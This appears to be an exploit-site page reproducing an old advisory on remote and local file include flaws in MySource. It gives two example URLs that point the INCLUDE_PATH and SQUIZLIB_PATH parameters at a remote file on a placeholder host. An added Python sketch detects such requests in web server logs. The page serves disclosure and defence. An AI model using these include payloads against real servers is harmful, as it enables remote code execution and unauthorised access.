Multiple Remote and Local File Include Vulnerabilities in MySource - exploit.company
Vendor: MySource
By: Unknown
CVSS: 7.5 (HIGH)
Remote and Local File Include
CWE: Unknown
Product Name: MySource
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Multiple Remote and Local File Include Vulnerabilities in MySource

The vulnerabilities are caused by a failure in the application to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process, potentially leading to unauthorized access.

Mitigation:

Proper input validation and sanitization should be implemented to prevent file inclusion vulnerabilities. Additionally, restricting access to sensitive files and directories can help mitigate the impact of these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15133/info

MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?
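
Detection sketch for the request pattern shown above, added here as an example and not part of the original advisory: it scans web server access logs for the two parameters named in the example URLs and flags values that point at a remote resource or traverse the local filesystem. The log layout, the classification rules and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter names taken from the advisory's example requests.
PATH_PARAMS = {"INCLUDE_PATH", "SQUIZLIB_PATH"}

# Assumed log layout: request line quoted as in the common/combined log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.I)  # http://, ftp://, php://, data:
UNC = re.compile(r"^(?:\\\\|//)")  # \\host\share or //host/share


def classify(value):
    """Return 'remote', 'local' or None for one decoded parameter value."""
    value = value.strip()
    if SCHEME.match(value) or UNC.match(value):
        return "remote"
    segments = re.split(r"[\\/]", value)
    if "\x00" in value or ".." in segments or value.startswith("/"):
        return "local"
    return None


def scan(lines):
    """Return (line_number, parameter, kind, value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        # parse_qsl percent-decodes once, matching what the application receives.
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value) if name in PATH_PARAMS else None
            if kind:
                hits.append((number, name, kind, value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http%3A%2F%2Fwww.example.com%2Ffile%3F HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=..%2F..%2F..%2Ftmp%2F HTTP/1.1" 200 128',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /web/index.php?page=home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```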